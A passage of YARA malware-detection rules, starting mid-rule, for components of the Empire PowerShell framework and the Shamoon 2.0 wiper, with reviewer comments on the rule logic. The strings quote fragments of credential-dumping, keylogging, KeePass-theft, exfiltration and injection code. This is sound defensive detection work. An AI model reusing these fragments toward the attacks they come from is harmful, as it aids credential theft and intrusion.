$s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" fullword ascii
condition:
// NOTE(review): only one string is defined, so "all of them" equals "1 of them" and
// the right-hand branch matches whenever $s1 is present. The "<#" prefix check
// (0x233c = bytes 3C 23) and the 10KB limit do not narrow the result.
( uint16(0) == 0x233c and filesize < 10KB and 1 of them ) or all of them
}
// Matches Empire's ReflectivePick DLL: a PE that names itself "ReflectivePick" and
// references the PowerShellRunner component by PDB path or DLL name.
rule Empire_ReflectivePick_x64_orig {
meta:
description = "Detects Empire component - file ReflectivePick_x64_orig.dll"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
modified = "2022-12-21"
hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2"
id = "cd69a149-d881-5f93-9647-84241bd96ba5"
strings:
// $a1 is searched as ASCII, $a2 as UTF-16LE (wide) only.
$a1 = "\\PowerShellRunner.pdb" ascii
$a2 = "PowerShellRunner.dll" fullword wide
$s1 = "ReflectivePick" fullword ascii
condition:
// "MZ" header (0x5a4d little-endian), under 400KB, one PowerShellRunner reference
// and the ReflectivePick name. A build with the PDB path stripped still matches
// through $a2 if the wide DLL name remains.
uint16(0) == 0x5a4d and filesize < 400KB and 1 of ($a*) and $s1
}
// Matches Empire's Out-Minidump.ps1 by the reflective MiniDumpWriteDump call and the
// line that names the dump file "<process>_<pid>.dmp".
rule Empire_Out_Minidump {
meta:
description = "Detects Empire component - file Out-Minidump.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1"
id = "8c53d2ab-afc5-5d7b-97e1-496425b9664f"
strings:
$s1 = "$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle," fullword ascii
$s2 = "$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"" fullword ascii
condition:
// 0x7566 read little-endian = bytes 66 75 ("fu") at offset 0.
// Left branch: prefix + under 10KB + either string. Right branch: both strings
// anywhere, without size or prefix limits.
( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
}
// Matches Empire's Invoke-PostExfil.ps1 by two pieces of comment/help text.
rule Empire_Invoke_PostExfil {
meta:
description = "Detects Empire component - file Invoke-PostExfil.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "00c0479f83c3dbbeff42f4ab9b71ca5fe8cd5061cb37b7b6861c73c54fd96d3e"
id = "58d9e057-efde-56ab-9b7e-982342a910e2"
strings:
// Both strings are documentation text, not code: a copy with comments and help
// removed contains neither.
$s1 = "# upload to a specified exfil URI" fullword ascii
$s2 = "Server path to exfil to." fullword ascii
condition:
// 0x490a read little-endian = bytes 0A 49 (line feed, "I") at offset 0, so the left
// branch depends on LF line endings and a leading blank line.
// Left branch: that prefix, under 2KB, either string. Right branch: both strings
// anywhere, without size or prefix limits.
( uint16(0) == 0x490a and filesize < 2KB and 1 of them ) or all of them
}
// Matches Empire's Invoke-SMBAutoBrute.ps1 by a sample status line and the line that
// reads a user's bad-password count.
rule Empire_Invoke_SMBAutoBrute {
meta:
description = "Detects Empire component - file Invoke-SMBAutoBrute.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "7950f8abdd8ee09ed168137ef5380047d9d767a7172316070acc33b662f812b2"
id = "a6b402ac-0925-5bc6-9d6a-b2b811496f9e"
strings:
// NOTE(review): $s1 looks like example output kept in the script's help text (a lab
// host name), so presumably it identifies the script file rather than its run-time
// output on a real network. Confirm against the sample.
$s1 = "[*] PDC: LAB-2008-DC1.lab.com" fullword ascii
$s2 = "$attempts = Get-UserBadPwdCount $userid $dcs" fullword ascii
condition:
// 0x7566 read little-endian = bytes 66 75 ("fu") at offset 0.
// Left branch: prefix + under 30KB + either string. Right branch: both strings
// anywhere, without size or prefix limits.
( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}
// Matches Empire's Get-Keystrokes.ps1 by one source line that polls the right mouse
// button through GetAsyncKeyState.
rule Empire_Get_Keystrokes {
meta:
description = "Detects Empire component - file Get-Keystrokes.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "c36e71db39f6852f78df1fa3f67e8c8a188bf951e96500911e9907ee895bf8ad"
id = "7fb57a0d-6b65-5ee8-96ef-9af303f15007"
strings:
$s1 = "$RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000" fullword ascii
condition:
// NOTE(review): only one string is defined, so "all of them" equals "1 of them" and
// the right-hand branch matches whenever $s1 is present. The "fu" prefix check
// (0x7566 = bytes 66 75) and the 30KB limit do not narrow the result.
( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}
// Matches Empire's Invoke-DllInjection.ps1 by a single short argument string,
// "-Dll evil.dll".
rule Empire_Invoke_DllInjection {
meta:
description = "Detects Empire component - file Invoke-DllInjection.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
id = "6aa14e8f-9801-5cd3-beb0-955e19d25503"
strings:
$s1 = "-Dll evil.dll" fullword ascii
condition:
// NOTE(review): only one string is defined, so "all of them" equals "1 of them" and
// the right-hand branch matches whenever $s1 is present; the "fu" prefix (0x7566)
// and 40KB limit do not narrow the result. In effect any scanned file of any size
// containing this 13-byte string matches, including documentation or write-ups that
// quote the example, so triage hits accordingly.
( uint16(0) == 0x7566 and filesize < 40KB and 1 of them ) or all of them
}
// Matches Empire's KeePassConfig.ps1 by one source line that enumerates files in a
// user master-key folder.
rule Empire_KeePassConfig {
meta:
description = "Detects Empire component - file KeePassConfig.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
id = "814a6ff9-a6ac-55e7-bb3f-597351ce421d"
strings:
$s1 = "$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )" fullword ascii
condition:
// NOTE(review): only one string is defined, so "all of them" equals "1 of them" and
// the right-hand branch matches whenever $s1 is present. The "#r" prefix check
// (0x7223 = bytes 23 72) and the 80KB limit do not narrow the result.
( uint16(0) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
}
// Matches Empire's Invoke-SSHCommand.ps1 by an embedded base64 PE header, a usage
// example and an error-message line.
rule Empire_Invoke_SSHCommand {
meta:
description = "Detects Empire component - file Invoke-SSHCommand.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "cbaf086b14d5bb6a756cbda42943d4d7ef97f8277164ce1f7dd0a1843e9aa242"
id = "b06b507f-b6b8-5f4b-8d6d-920f141e9ac1"
strings:
// "TVqQ" is the base64 form of the bytes 4D 5A 90 ("MZ" header). NOTE(review): any
// script that assigns a base64-encoded PE to a variable named $Base64 would satisfy
// $s1; in the left branch below one string is enough.
$s1 = "$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA" ascii
// Help-text example; the address and credentials in it are the example's values.
$s2 = "Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"" fullword ascii
$s3 = "Write-Verbose \"[*] Error loading dll\"" fullword ascii
condition:
// 0x660a read little-endian = bytes 0A 66 (line feed, "f") at offset 0.
// Left branch: that prefix, under 2000KB, any one string. Right branch: all three
// strings anywhere, without size or prefix limits.
( uint16(0) == 0x660a and filesize < 2000KB and 1 of them ) or all of them
}
// Generic Empire rule: two source lines that the five listed samples (hash1..hash5)
// are recorded as sharing. super_rule = 1 presumably marks a rule generated from
// strings common to several files; YARA itself does not evaluate meta values.
rule Empire_PowerShell_Framework_Gen1 {
meta:
description = "Detects Empire component"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
hash2 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
hash3 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
hash4 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
hash5 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
id = "8fdb48a0-5d40-55be-ae23-e9c8c4c2ecea"
strings:
$s1 = "Write-BytesToMemory -Bytes $Shellcode" ascii
$s2 = "$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)" fullword ascii
condition:
// 0x7566 read little-endian = bytes 66 75 ("fu") at offset 0.
// Left branch: prefix + under 4000KB + either string. Right branch: both strings
// anywhere, without size or prefix limits.
( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}
// Matches Empire's PowerUp.ps1 by two sc.exe service-manipulation lines. The
// description names the same file twice and only one hash is listed.
rule Empire_PowerUp_Gen {
meta:
description = "Detects Empire component - from files PowerUp.ps1, PowerUp.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
id = "ae6b0462-7193-54a4-8fb9-befc1b461b15"
strings:
// NOTE(review): sc.exe config/pause lines of this shape could also occur in
// legitimate service-management scripts; in the left branch one is enough.
$s1 = "$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath" fullword ascii
$s2 = "$Result = sc.exe pause $($TargetService.Name)" fullword ascii
condition:
// 0x233c read little-endian = bytes 3C 23 ("<#"), a PowerShell block-comment opener.
// Left branch: that prefix, under 2000KB, either string. Right branch: both strings
// anywhere, without size or prefix limits.
( uint16(0) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
}
// Generic Empire rule: a DllMain delegate line and a shellcode source comment that
// the listed samples are recorded as sharing. The hash keys are numbered with gaps
// (1, 3, 5, 6, 8); they are metadata only and do not affect matching.
rule Empire_PowerShell_Framework_Gen2 {
meta:
description = "Detects Empire component"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
hash3 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
hash5 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
hash6 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
hash8 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
id = "eab277ca-0dd4-5035-82aa-1ac2120bac94"
strings:
$x1 = "$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)" fullword ascii
// A source comment: absent from copies with comments stripped.
$s20 = "#Shellcode: CallDllMain.asm" fullword ascii
condition:
// 0x7566 read little-endian = bytes 66 75 ("fu") at offset 0.
// Left branch: prefix + under 4000KB + either string. Right branch: both strings
// anywhere, without size or prefix limits.
( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}
// Matches Empire's agent.ps1 by lines from its beaconing code: setting the User-Agent
// header and computing a sleep interval from AgentDelay and AgentJitter.
// hash1 and hash2 hold the same value, so only one sample is actually referenced.
rule Empire_Agent_Gen {
meta:
description = "Detects Empire component - from files agent.ps1, agent.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
hash2 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
id = "0fac915c-2502-50da-93d1-f81e9282aa9a"
strings:
$s1 = "$wc.Headers.Add(\"User-Agent\",$script:UserAgent)" fullword ascii
$s2 = "$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)" fullword ascii
$s3 = "if ($script:AgentDelay -ne 0){" fullword ascii
condition:
// 0x660a read little-endian = bytes 0A 66 (line feed, "f") at offset 0.
// Left branch: that prefix, under 100KB, any one string. Right branch: all three
// strings anywhere, without size or prefix limits.
// The strings are the agent's plain source; an encoded or obfuscated stager that
// only unpacks the agent in memory is outside what this file-based rule can see.
( uint16(0) == 0x660a and filesize < 100KB and 1 of them ) or all of them
}
// Generic Empire rule: a PE-type check line and the phrase "remote DLL injection"
// that the four listed samples are recorded as sharing.
rule Empire_PowerShell_Framework_Gen3 {
meta:
description = "Detects Empire component"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
hash3 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
hash4 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
id = "b0f7ed41-be65-5e43-aeb1-56e5e7384e8f"
strings:
$s1 = "if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))" fullword ascii
// A short plain-English phrase without fullword. In the left branch below it is
// sufficient on its own for any file under 4000KB that starts with "fu".
$s2 = "remote DLL injection" ascii
condition:
// 0x7566 read little-endian = bytes 66 75 ("fu") at offset 0.
// Left branch: prefix + under 4000KB + either string. Right branch: both strings
// anywhere, without size or prefix limits.
( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}
// Matches Empire's Invoke-InveighRelay.ps1 by lines that record a failed SMB relay
// target and base64-encode an NTLM challenge. Only a hash2 entry is listed.
rule Empire_Invoke_InveighRelay_Gen {
meta:
description = "Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash2 = "21b90762150f804485219ad36fa509aeda210d46453307a9761c816040312f41"
id = "0adebf6f-99e1-5461-8efc-e4660faf6d5d"
strings:
$s1 = "$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")" fullword ascii
$s2 = "$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)" fullword ascii
condition:
// 0x7566 read little-endian = bytes 66 75 ("fu") at offset 0.
// Left branch: prefix + under 200KB + either string. Right branch: both strings
// anywhere, without size or prefix limits.
( uint16(0) == 0x7566 and filesize < 200KB and 1 of them ) or all of them
}
// Matches Empire's KeePassConfig.ps1 by one source line that loads a KeePass XML
// configuration file. Only a hash2 entry is listed.
rule Empire_KeePassConfig_Gen {
meta:
description = "Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash2 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
id = "e2bc88c5-50f8-5ddc-a449-41929b1d0528"
strings:
$s1 = "$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)" fullword ascii
condition:
// NOTE(review): only one string is defined, so "all of them" equals "1 of them" and
// the right-hand branch matches whenever $s1 is present. The "#r" prefix check
// (0x7223 = bytes 23 72) and the 80KB limit do not narrow the result.
( uint16(0) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
}
/*
 * Flags the Invoke-Portscan.ps1 script distributed with the Empire framework
 * (see reference).
 * NOTE(review): port-scan scripts of this name circulate in other public
 * PowerShell toolkits as well. Confirm the lineage before labelling a hit as
 * Empire or tying it to a specific actor.
 */
rule Empire_Invoke_Portscan_Gen {
    meta:
        description = "Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        // Only hash2 is recorded, and the description names the same file twice.
        hash2 = "cf7030be01fab47e79e4afc9e0d4857479b06a5f68654717f3bc1bc67a0f38d3"
        id = "c2e01780-02d2-57d1-b38e-5c345ebccad6"

    strings:
        // Two literal source lines: a Test-Port call and one branch of a
        // switch that sets host/thread/timeout values. Whitespace inside $s2
        // is matched exactly, so a reformatted copy will not hit on it.
        $s1 = "Test-Port -h $h -p $Port -timeout $Timeout" fullword ascii
        $s2 = "1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }" fullword ascii

    condition:
        // Both lines anywhere, or a single line in a file under 100KB that
        // starts with the bytes "fu" (0x66 0x75).
        all of them or ( uint16(0) == 0x7566 and filesize < 100KB and 1 of them )
}
/*
 * Generic rule for several Empire scripts (see reference) that share the same
 * reflection helper code: looking up System.dll in the GAC, resolving a module
 * handle, and building a dynamic 'ReflectedDelegate' assembly.
 * The description does not say which scripts the ten hashes belong to.
 */
rule Empire_PowerShell_Framework_Gen4 {
    meta:
        description = "Detects Empire component"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash1 = "743c51334f17751cfd881be84b56f648edbdaf31f8186de88d094892edc644a9"
        // hash2 and hash3 carry the same value, so the rule references nine
        // distinct samples, not ten.
        hash2 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
        hash3 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
        hash4 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
        hash5 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
        hash6 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
        hash7 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
        hash8 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
        hash9 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
        hash10 = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
        id = "c390638a-0eb1-576d-a08c-203c31d414f3"

    strings:
        $s1 = "Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }" fullword ascii
        // $s2 is a source comment, not code. It only survives in copies that
        // keep the original comments, so treat it as the weakest of the four.
        $s2 = "# Get a handle to the module specified" fullword ascii
        $s3 = "$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))" fullword ascii
        $s4 = "$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')" fullword ascii

    condition:
        // All four lines anywhere, or any single one in a file under 4000KB
        // that starts with the bytes "fu" (0x66 0x75). All strings are
        // `ascii` only, so UTF-16 encoded copies are not covered.
        all of them or ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them )
}
/*
 * Generic rule for code shared by three Empire scripts named in the
 * description: Invoke-DCSync.ps1, Invoke-PSInject.ps1 and
 * Invoke-ReflectivePEInjection.ps1.
 * NOTE(review): reflective PE loading code of this kind is reused across
 * public PowerShell toolkits. A hit points at the loader code and should be
 * confirmed before it is attributed to Empire or to a specific actor.
 */
rule Empire_Invoke_Gen {
    meta:
        description = "Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash1 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
        hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
        hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
        id = "913f971d-e4e3-55e9-904b-82b25a4e6f0f"

    strings:
        // Two short assignments that depend on exact variable names and
        // spacing. A copy with renamed variables or changed spacing no
        // longer matches.
        $s1 = "$Shellcode1 += 0x48" fullword ascii
        $s2 = "$PEHandle = [IntPtr]::Zero" fullword ascii

    condition:
        // Both lines anywhere, or a single line in a file under 3000KB that
        // starts with the bytes "fu" (0x66 0x75).
        all of them or ( uint16(0) == 0x7566 and filesize < 3000KB and 1 of them )
}
/*
 * Generic rule for Empire scripts (see reference) that share the handling of
 * the $ExeArgs argument string, including the literal "ReflectiveExe" prefix.
 * The description does not name the source files behind the three hashes.
 */
rule Empire_PowerShell_Framework_Gen5 {
    meta:
        description = "Detects Empire component"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
        hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
        hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
        id = "4c23592e-5788-5b84-995a-028142cbc52f"

    strings:
        // $s1 is an ordinary null/empty check and carries little signal by
        // itself; $s2 is the more specific of the two lines.
        $s1 = "if ($ExeArgs -ne $null -and $ExeArgs -ne '')" fullword ascii
        $s2 = "$ExeArgs = \"ReflectiveExe $ExeArgs\"" fullword ascii

    condition:
        // Both lines anywhere, or a single line in a file under 1000KB that
        // starts with the bytes "fu" (0x66 0x75). Strings are `ascii` only,
        // so UTF-16 encoded copies are not covered.
        all of them or ( uint16(0) == 0x7566 and filesize < 1000KB and 1 of them )
}
/*
 * Flags a file dropped by Shamoon, per the description and the referenced
 * presentation.
 * NOTE(review): the rule has no file-type or size constraint and is built
 * from placeholder-looking strings, so test fixtures and sample configs can
 * satisfy it. Treat hits as low confidence until the file is examined. The
 * meta block has no author, date, hash or score to help triage.
 */
rule CrowdStrike_Shamoon_DroppedFile {
    meta:
        // The description embeds a shortened link; record the resolved URL
        // alongside it, since short links can stop resolving.
        description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
        reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
        id = "b350f1b1-db73-574b-957b-34e5a84f68b0"

    strings:
        // Every string is `wide` (UTF-16LE) only; plain ASCII occurrences of
        // the same text do not match.
        $testn123 = "test123" wide
        $testn456 = "test456" wide
        $testn789 = "test789" wide
        $testdomain = "testdomain.com" wide
        $pingcmd = "ping -n 30 127.0.0.1 >nul" wide

    condition:
        // The domain string is mandatory; with it, either the ping command
        // or any one of the three test* strings completes the match.
        $testdomain and ( $pingcmd or any of ($testn*) )
}
/*
 * Flags the wiper component of Shamoon 2.0 (per the description), using
 * UTF-16LE strings found in the two referenced samples.
 */
rule Shamoon2_Wiper {
    meta:
        description = "Detects Shamoon 2.0 Wiper Component"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        // Shortened link; record the resolved URL alongside it, since short
        // links can stop resolving.
        reference = "https://goo.gl/jKIfGB"
        date = "2016-12-01"
        score = 70
        hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
        hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
        id = "6660a64c-daa4-59e6-aa65-55194cac600c"

    strings:
        // Format string for an executable path under System32.
        $a1 = "\\??\\%s\\System32\\%s.exe" fullword wide
        // Long upper-case letter sequence; the most sample-specific pattern.
        $x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
        $s1 = "UFWYNYNTS" fullword wide
        // NOTE(review): looks like the device name of a raw disk access
        // driver. Software that legitimately uses such a driver could carry
        // the same string, which is presumably why no single string is
        // enough to match. Confirm against the referenced report.
        $s2 = "\\\\?\\ElRawDisk" fullword wide

    condition:
        // Three of the four strings anywhere, or two of them in an MZ
        // executable (first bytes 0x4D 0x5A) smaller than 1000KB.
        ( 3 of them ) or ( 2 of them and uint16(0) == 0x5a4d and filesize < 1000KB )
}
/*
 * Flags the communication component of Shamoon 2.0 (per the description).
 * Unlike the rules that fall back to strings alone, this one always requires
 * an MZ header and a size under 500KB, so it does not apply to memory dumps
 * or to data that lacks the executable header.
 */
rule Shamoon2_ComComp {
    meta:
        description = "Detects Shamoon 2.0 Communication Components"
        author = "Florian Roth (Nextron Systems) (with Binar.ly)"
        // Shortened link; record the resolved URL alongside it, since short
        // links can stop resolving.
        reference = "https://goo.gl/jKIfGB"
        date = "2016-12-01"
        score = 70
        hash1 = "61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842"
        id = "72068264-4f71-59fb-b3d8-938285ec8c7f"

    strings:
        // Two ASCII format strings: a mkdir command line and a name template.
        $s1 = "mkdir %s%s > nul 2>&1" fullword ascii
        $s2 = "p[%s%s%d.%s" fullword ascii
        // Three 16-byte sequences, presumably code bytes taken from the
        // sample (the $op prefix suggests opcodes). They are tied to one
        // build, so a recompiled variant may only match through $s*.
        $op1 = { 04 32 cb 88 04 37 88 4c 37 01 88 54 37 02 83 c6 }
        $op2 = { c8 02 d2 c0 e9 06 02 d2 24 3f 02 d1 88 45 fb 8d }
        $op3 = { 0c 3b 40 8d 4e 01 47 3b c1 7c d8 83 fe 03 7d 1c }

    condition:
        // Either both format strings or all three byte sequences, always
        // inside an MZ executable (first bytes 0x4D 0x5A) under 500KB.
        ( all of ($op*) or all of ($s*) ) and filesize < 500KB and uint16(0) == 0x5a4d
}